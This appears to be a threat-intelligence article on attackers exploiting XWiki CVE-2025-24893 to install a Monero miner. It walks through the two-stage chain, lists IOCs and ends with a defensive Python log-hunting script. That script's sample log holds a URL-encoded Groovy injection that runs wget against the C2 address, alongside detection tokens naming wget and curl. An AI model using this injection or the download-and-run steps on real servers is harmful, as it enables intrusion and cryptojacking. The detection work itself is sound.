A critical remote code execution (RCE) flaw in XWiki, a popular open-source wiki platform, was exploited in the wild to deploy cryptocurrency mining malware on compromised servers.
The vulnerability, tracked as CVE-2025-24893, allows unauthenticated attackers to inject malicious templates and execute arbitrary code, bypassing authentication entirely.
This discovery highlights the growing threat to web applications, where real-world attacks often outpace official alerts from bodies such as CISA's Known Exploited Vulnerabilities (KEV) catalog.
VulnCheck, a vulnerability intelligence firm, reported the exploitation based on data from its Canary network, which simulates vulnerable systems to detect attacks.
Unlike earlier reports from Cyble, Shadow Server, and CrowdSec that noted only exploit attempts, VulnCheck's observations reveal a sophisticated two-stage attack chain originating from an IP address in Vietnam.
The flaw, added to VulnCheck KEV in March 2025, involves template injection in XWiki's SolrSearch endpoint, enabling attackers to run Groovy scripts for command execution.
Its absence from CISA KEV underscores how exploitation can surge before formal recognition, leaving organizations exposed.
The Two-Stage Exploitation Process
The attack unfolds in two phases, separated by at least 20 minutes, to evade detection.
In the initial request, attackers send a URL-encoded GET to the SolrSearch endpoint, injecting an asynchronous Groovy payload that uses wget to download a downloader script named x640 from a command-and-control (C2) server at 193.32.208.24:8080.
This script is saved to /tmp/11909 on the target system. The payload mimics legitimate browser traffic with a Firefox user agent to blend in.
Roughly 20 minutes later, a second request executes the staged file by invoking bash on /tmp/11909. The downloader then fetches two further scripts, x521 and x522, piping them directly to bash for execution, VulnCheck said.
These scripts handle the payload delivery: x521 creates directories in /var/tmp, downloads the coinminer binary tcrond from the same C2, and sets executable permissions.
Meanwhile, x522 cleans the environment by killing competing miners such as xmrig and kinsing, clears history logs, and launches tcrond with a configuration pointing to auto.c3pool.org on port 80.
The miner, UPX-packed for obfuscation, uses a Monero wallet address for payouts, indicating a low-sophistication but persistent operation.
All traffic traces back to 123.25.249.88, flagged in multiple AbuseIPDB reports for abusive activity.
Key Indicators
Defenders can use these indicators to hunt for related activity across their networks. The exploitation leverages transfer.sh for hosting payloads, a common tactic in cryptojacking campaigns.
Indicator Type           Details
IP Addresses             123.25.249.88 (Attacker, Vietnam); 193.32.208.24 (C2 Server)
File Hashes (SHA-256)    tcrond (packed): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10
                         tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b
                         x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed
                         x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f
                         x640: 5abc337dbc04fee7206956dad1e0b6d43921a868
CVSS Score               9.8 (Critical) – Unauthenticated RCE via template injection in XWiki versions prior to 15.10.6
Affected Products        XWiki Enterprise, XWiki Standard; impacts web servers running vulnerable instances
Note that the hash values as listed are 40 hexadecimal characters long, which is the length of a SHA-1 digest rather than SHA-256, so confirm the algorithm against VulnCheck's original report before loading them into a hunt.
Organizations using XWiki should patch immediately to version 15.10.6 or later, monitor for anomalous wget traffic, and scan for these IOCs.
VulnCheck's Canaries demonstrate the value of proactive threat intelligence in bridging gaps left by delayed official listings.
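As an added example (not from VulnCheck or the XWiki project), the following script hunts web-server access logs for the first stage of the chain described above: requests to the SolrSearch endpoint whose decoded query carries wiki-macro or download tokens, plus any line that involves the two published IP indicators. The request path and the sample log lines are constructed assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# IP indicators as published in the report above.
IOC_IPS = {"123.25.249.88", "193.32.208.24"}
# Assumed request path for XWiki's SolrSearch page; adjust to your deployment.
SOLR_PATH_SUFFIX = "SolrSearch"
# Tokens a legitimate search query should never carry once URL-decoded:
# wiki macro delimiters, the Groovy macro name, or a download utility.
SUSPECT_TOKENS = ("{{", "groovy", "wget", "curl")

# Apache/nginx combined log format: client ip, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def inspect_line(line):
    """Return the reasons a single log line is suspicious (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    if m["ip"] in IOC_IPS:
        reasons.append(f"source {m['ip']} is a published IOC")
    path, _, query = m["url"].partition("?")
    decoded = unquote_plus(query).lower()
    if path.endswith(SOLR_PATH_SUFFIX):
        hits = [t for t in SUSPECT_TOKENS if t in decoded]
        if hits:
            reasons.append(f"SolrSearch query contains {hits}")
    for ip in IOC_IPS:
        if ip in decoded:
            reasons.append(f"query references IOC address {ip}")
    return reasons

def hunt(log_text):
    """Return (line number, reasons) for every suspicious line in a log blob."""
    return [(n, r) for n, line in enumerate(log_text.splitlines(), 1)
            if (r := inspect_line(line))]

# Constructed sample log: one normal page view, one benign search, one staged request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2025:10:00:01 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2025:10:00:09 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 880 "-" "Mozilla/5.0"
123.25.249.88 - - [10/Mar/2025:10:01:12 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Bgroovy%7D%7D+wget+http%3A%2F%2F193.32.208.24%3A8080%2Fx640 HTTP/1.1" 200 880 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
"""

if __name__ == "__main__":
    for lineno, reasons in hunt(SAMPLE_LOG):
        print(f"line {lineno}: " + "; ".join(reasons))
```

A hit on the SolrSearch token check alone is worth triage even when the source address is not on the IOC list, since the second-stage request arrives about 20 minutes later from the same client.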